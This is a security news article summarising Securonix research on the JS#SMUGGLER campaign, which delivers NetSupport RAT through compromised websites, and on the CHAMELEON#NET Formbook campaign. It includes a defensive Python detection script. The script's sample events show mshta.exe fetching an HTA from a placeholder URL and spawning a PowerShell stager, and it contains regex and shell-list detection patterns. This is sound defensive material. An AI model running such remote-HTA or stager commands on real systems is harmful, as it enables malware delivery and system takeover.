Experts Reveal JS#SMUGGLER Exploits Sites to Deploy NetSupport RAT

Cybersecurity experts have uncovered a new campaign known as JS#SMUGGLER. This operation exploits compromised websites to distribute a remote access trojan (RAT) called NetSupport RAT. The investigation, conducted by Securonix, reveals a complex attack chain involving several critical components.

Attack Chain Analysis

JS#SMUGGLER integrates a three-part system:

  • An obfuscated JavaScript loader embedded in compromised websites.
  • An HTML Application (HTA) that executes encrypted PowerShell scripts using “mshta.exe.”
  • A PowerShell payload designed to download and run the primary malware.

According to researchers Akshay Gaikwad, Shikha Sangwan, and Aaron Beardslee, NetSupport RAT provides attackers with extensive capabilities. These include remote desktop access, file management, command execution, data theft, and proxy functionalities.

Target Demographics and Methods

This campaign primarily targets enterprise users, highlighting a broad attack strategy. Securonix describes it as a multi-stage, web-based malware operation that employs techniques such as hidden iframes and obfuscated loaders to facilitate the distribution and execution of the malicious payload.

The initial phase uses silent redirects embedded in infected websites. These redirect users to a heavily encrypted JavaScript loader named “phone.js,” which profiles the user’s device. Depending on the device type, either a full-screen iframe or a second-stage remote script is activated.

The JavaScript loader incorporates a unique tracking mechanism. This ensures that the malicious logic activates only once during a user’s initial visit, significantly lowering detection risks. Such device-aware approaches allow attackers to customize how infections spread and minimize their visibility.

Deployment Mechanics

The remote script lays the groundwork by generating a URL to download the HTA payload, which is executed via “mshta.exe.” This HTA serves as another loader that handles a temporary PowerShell stager, which is then decrypted and executed directly in memory to evade detection.

To further obscure its activities, the HTA file runs in a stealthy mode, minimizing its visual footprint. After executing the decrypted payload, it attempts to erase evidence by removing the PowerShell stager from disk and terminating itself.

Consequences and Recommendations

The main objective of the PowerShell payload is to acquire and deploy NetSupport RAT, granting attackers full control over affected systems. Securonix emphasizes that the sophistication observed suggests a well-maintained malware framework.

To counter such threats, cybersecurity defenses should implement strong Content Security Policy (CSP) measures, monitor scripts closely, enable PowerShell logging, restrict “mshta.exe,” and utilize behavioral analytics to identify potential attacks.
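Two of these recommendations, restricting “mshta.exe” and watching for the HTA-to-PowerShell hand-off described above, can be expressed as simple detection rules over process-creation telemetry. The following is an added example written for this article, not code from Securonix or from the campaign; the event field names (image, parent, cmdline) and the sample events are constructed for illustration.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style).
# These are illustrative, not telemetry from the Securonix report.
SAMPLE_EVENTS = [
    {"image": "C:\\Windows\\System32\\mshta.exe",
     "parent": "C:\\Program Files\\Browser\\browser.exe",
     "cmdline": "mshta.exe http://example.invalid/stage.hta"},
    {"image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "parent": "C:\\Windows\\System32\\mshta.exe",
     "cmdline": "powershell.exe -File C:\\Users\\u\\AppData\\Local\\Temp\\stager.ps1"},
    {"image": "C:\\Windows\\System32\\mshta.exe",
     "parent": "C:\\Windows\\explorer.exe",
     "cmdline": "mshta.exe C:\\Tools\\approved\\helper.hta"},
    {"image": "C:\\Windows\\System32\\notepad.exe",
     "parent": "C:\\Windows\\explorer.exe",
     "cmdline": "notepad.exe"},
]

# mshta.exe being handed a URL rather than a local .hta file.
REMOTE_HTA = re.compile(r"\bmshta(\.exe)?\s+\"?https?://", re.IGNORECASE)
# Script hosts that mshta.exe has no routine business spawning.
SHELLS = ("powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe")


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(event, allowed_hta=()):
    """Return the names of the rules a single event triggers.

    allowed_hta: directory prefixes (hypothetical allow-list) from which
    HTA execution is sanctioned; anything else is flagged.
    """
    hits = []
    image, parent = basename(event["image"]), basename(event["parent"])
    cmd = event["cmdline"]
    if image == "mshta.exe" and REMOTE_HTA.search(cmd):
        hits.append("mshta_remote_hta")
    if parent == "mshta.exe" and image in SHELLS:
        hits.append("mshta_spawns_shell")
    if image == "mshta.exe" and not any(a.lower() in cmd.lower() for a in allowed_hta):
        hits.append("mshta_outside_allowlist")
    return hits


def scan(events, allowed_hta=()):
    """Map event index to its triggered rules, omitting clean events."""
    return {i: h for i, e in enumerate(events) if (h := detect(e, allowed_hta))}
```

Because the stager is removed from disk afterwards, the parent/child relationship in the second rule is often the only durable artifact, so keep process-creation and PowerShell script-block logging enabled rather than relying on file scans.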

Related Campaign: CHAMELEON#NET

Recently, Securonix also disclosed another campaign named CHAMELEON#NET, targeting users in the National Social Security Sector. This campaign relies on phishing emails to distribute Formbook, a keylogger and information-stealing malware.

The phishing emails entice users to download a seemingly harmless archive. Once downloaded, a heavily obfuscated JavaScript file acts as a dropper, initiating a multi-stage infection sequence that eventually executes Formbook RAT from memory.

Key Techniques in CHAMELEON#NET

  • The use of a custom decryption routine for enhanced evasion.
  • Reflection and conditional XOR operations to decrypt and run malware.
  • Persistence through the Windows Startup folder and Registry modifications.

Securonix notes that the tactics employed in both JS#SMUGGLER and CHAMELEON#NET demonstrate a combination of social engineering and advanced obfuscation techniques, making detection challenging for security solutions.